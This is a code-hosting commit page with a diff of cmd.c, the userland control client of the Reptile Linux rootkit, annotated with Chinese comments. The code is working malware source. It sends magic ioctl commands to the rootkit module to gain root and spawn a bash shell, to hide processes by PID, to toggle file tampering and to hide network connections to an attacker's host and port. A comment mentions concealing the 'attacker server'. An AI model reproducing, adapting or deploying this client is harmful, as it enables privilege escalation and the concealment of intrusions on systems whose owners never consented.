py5ktlmgf
/
reptile
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update cmd.c

Browse Source
Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b
1 changed files with 178 additions and 167 deletions
Show Stats Download Patch File Download Diff File

343
src/Reptile/userland/cmd.c
Unescape View File

@ -10,178 +10,189 @@
#include <sys/types.h> #include <sys/types.h>
#include <unistd.h> #include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash" #define SHELL "/bin/bash"
/**
* @brief
*/
struct control { struct control {
unsigned short cmd; unsigned short cmd; // 命令类型
void *argv; void *argv; // 命令参数
}; };
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sockfd; int sockfd; // 套接字文件描述符
struct control args; struct control args; // 控制结构体实例
struct sockaddr_in addr; struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; struct hostent *host; // 主机信息结构体指针
unsigned int pid; unsigned int pid; // 进程ID
char *bash = SHELL; char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
if (argc < 2) // 如果参数少于2个退出程序
exit(0); if (argc < 2)
exit(0);
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0) // 创建TCP套接字
goto fail; sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
if (strcmp(argv[1], "root") == 0) { goto fail; // 如果创建失败跳转到fail标签
if (geteuid() == 0) {
printf("You are already root! :)\n\n"); // 如果第一个参数是"root"
close(sockfd); if (strcmp(argv[1], "root") == 0) {
goto out; // 如果已经是root用户提示并关闭套接字后退出
} if (geteuid() == 0) {
printf("You are already root! :)\n\n");
args.cmd = 3; close(sockfd);
goto out;
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA); args.cmd = 3; // 设置命令为3
}
// 通过ioctl系统调用进行身份验证
if (geteuid() == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n"); ioctl(sockfd, AUTH, &args);
execve(bash, arg, envp); ioctl(sockfd, AUTH, HTUA);
} else { }
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
} // 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) {
goto out; printf("\e[01;36mYou got super powers!\e[00m\n\n");
} execve(bash, arg, envp);
} else {
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) { printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
if (argc < 2) }
goto fail;
goto out; // 跳转到out标签
if (argc == 2) { }
args.cmd = 0;
// 如果第一个参数是"hide"或"show"
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { // 如果参数少于2个跳转到fail标签
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (argc < 2)
printf("\e[01;32mSuccess!\e[00m\n"); goto fail;
goto out;
} // 如果只有一个参数,隐藏或显示所有连接
} if (argc == 2) {
} args.cmd = 0; // 设置命令为0
} else {
// 通过ioctl系统调用进行身份验证
args.cmd = 1; if (ioctl(sockfd, AUTH, HTUA) == 0) {
pid = (unsigned int)atoi(argv[2]); if (ioctl(sockfd, AUTH, &args) == 0) {
args.argv = &pid; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
if (ioctl(sockfd, AUTH, HTUA) == 0) { goto out; // 成功后跳转到out标签
if (ioctl(sockfd, AUTH, &args) == 0) { }
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
printf("\e[01;32mSuccess!\e[00m\n"); }
goto out; } else { // 如果有两个参数隐藏或显示指定PID的连接
} args.cmd = 1; // 设置命令为1
} pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
} args.argv = &pid; // 设置命令参数为PID
}
} // 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (strcmp(argv[1], "file-tampering") == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
args.cmd = 2; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
if (ioctl(sockfd, AUTH, HTUA) == 0) { goto out; // 成功后跳转到out标签
if (ioctl(sockfd, AUTH, &args) == 0) { }
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
printf("\e[01;32mSuccess!\e[00m\n"); }
goto out; }
} }
}
} // 如果第一个参数是"file-tampering"
} if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; // 设置命令为2
if (strcmp(argv[1], "conn") == 0) {
if (argc < 4) // 通过ioctl系统调用进行身份验证
goto fail; if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (strcmp(argv[4], "hide") == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
args.cmd = 4; printf("\e[01;32mSuccess!\e[00m\n");
} else if (strcmp(argv[4], "show") == 0) { goto out; // 成功后跳转到out标签
args.cmd = 5; }
} else { }
goto fail; }
} }
host = gethostbyname(argv[2]); // 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) {
if (host == NULL) // 如果参数少于4个跳转到fail标签
goto fail; if (argc < 4)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length); // 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) {
addr.sin_family = AF_INET; args.cmd = 4; // 设置命令为4
addr.sin_port = htons(atoi(argv[3])); } else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; // 设置命令为5
args.argv = &addr; } else {
goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
if (ioctl(sockfd, AUTH, HTUA) == 0) { }
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { // 获取主机信息
printf("\e[01;32mSuccess!\e[00m\n"); host = gethostbyname(argv[2]);
goto out; if (host == NULL)
} goto fail; // 如果获取主机信息失败跳转到fail标签
}
} // 复制主机地址到地址结构体中
} memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
/* /*
UDPTCP使
// This part is deprecated. There is no reason to hide specific protocols if (strcmp(argv[1], "udp") == 0) {
// when you want to hide some connection, in the most of cases you will if (argc < 4)
// need to hide every connection and everything about your attacker server. goto fail;
if (strcmp(argv[4], "hide") == 0) {
if (strcmp(argv[1], "udp") == 0) { args.cmd = 6;
if (argc < 4) } else if (strcmp(argv[4], "show") == 0) {
goto fail; args.cmd = 7;
} else {
if (strcmp(argv[4], "hide") == 0) { goto fail;
args.cmd = 6; }
} else if (strcmp(argv[4], "show") == 0) { host = gethostbyname(argv[2]);
args.cmd = 7; if (host == NULL)
} else { goto fail;
goto fail; memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
} addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
host = gethostbyname(argv[2]); args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (host == NULL) if (ioctl(sockfd, AUTH, &args) == 0) {
goto fail; if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, goto out;
host->h_length); }
}
addr.sin_family = AF_INET; }
addr.sin_port = htons(atoi(argv[3])); }*/
fail: // fail标签打印失败信息并关闭套接字
args.argv = &addr; printf("\e[01;31mFailed!\e[00m\n");
out: // out标签关闭套接字并返回0表示程序结束
if (ioctl(sockfd, AUTH, HTUA) == 0) { close(sockfd); // 关闭套接字文件描述符
if (ioctl(sockfd, AUTH, &args) == 0) { return 0; // 返回0表示程序正常结束
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
*/
fail:
printf("\e[01;31mFailed!\e[00m\n");
out:
close(sockfd);
return 0;
} }
Write Preview
Loading…
Cancel
Save